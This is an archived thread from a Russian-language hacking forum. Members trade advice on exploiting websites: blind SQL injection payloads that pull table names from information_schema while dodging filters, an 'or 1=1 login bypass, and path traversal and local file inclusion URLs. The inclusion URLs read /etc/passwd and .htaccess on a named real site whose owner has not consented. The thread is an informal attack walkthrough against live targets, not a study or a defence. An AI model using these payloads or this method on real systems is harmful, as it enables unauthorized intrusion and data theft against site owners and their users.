ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.01.2010, 18:55
|
|
Участник форума
Регистрация: 30.07.2008
Сообщений: 152
Провел на форуме:
659306
Репутация:
34
|
|
Чо делать после с базой после расшифровки паса? Я тут одну вскрыл, но хз, что с ней делать. И как найти админку? КУды входить по этому пасу? 
Последний раз редактировалось sNt; 24.01.2010 в 19:03..
|
|
|
24.01.2010, 20:17
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от ElteRUS
YuNi|[c,
https://forum.antichat.ru/showpost.php?p=1734696&postcount=12
https://forum.antichat.ru/showpost.php?p=1734851&postcount=13
ну спс уже прочел но там:
substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)
и в моем случае
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527 CHARACTER_SETS%2527/**/LIMIT/**/ 1)/**/from/**/ 1/**/for/**/ 1)))=99/*
тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц
|
|
|
|
24.01.2010, 21:40
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php
|
|
|
|
24.01.2010, 21:44
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от ronald
Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php
а с чего ты вззял что там скуля?
|
|
|
|
24.01.2010, 21:45
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
Упс, там случилось что-то, не работает скрипт, ещё вчера была форма входа с sql
Извиняюсь, ссылка битая теперь тут всё это лежит: http://dmironova.ru/admin/?lang=no
|
|
|
|
24.01.2010, 21:46
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от Gorev
а с чего ты вззял что там скуля?
http://dmironova.ru/admin/
'or 1=1/*
http://dmironova.ru/admin/login.php?lang=../../../../../../etc/passwd%00
Последний раз редактировалось v1d0qz; 24.01.2010 в 21:58..
|
|
|
|
24.01.2010, 21:50
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
http://dmironova.ru/admin/login.php?lang=hjhj
Warning: include_once(/home/dmironova/dmironova.ru/docs/admin/language/hjhj/admin/total.php) [function.include-once]: failed to open stream: No such file or directory in /home/dmironova/dmironova.ru/docs/admin/function.php(1) : eval()'d code on line 179
инклуд?
|
|
|
|
24.01.2010, 21:55
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от jecka3000
инклуд?
http://dmironova.ru/admin/login.php?lang=/../../../../../../../../../../../../../../etc/passwd%00
|
|
|
|
24.01.2010, 21:55
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от jecka3000
инклуд?
Да, инклуд.
Код:
http://dmironova.ru/admin/login.php?lang=../../.htaccess%00
|
|
|
|
25.01.2010, 12:59
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от YuNi|[c
ну спс уже прочел но там:
substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)
и в моем случае
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц
А то, что по второй ссылке прочитал ? Там показано как использовать лимит при фильтрации запятых.
Вот похожая ситуация
https://forum.antichat.ru/showpost.php?p=1550051
Разберись что и как и подгони запрос под свою скулю.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
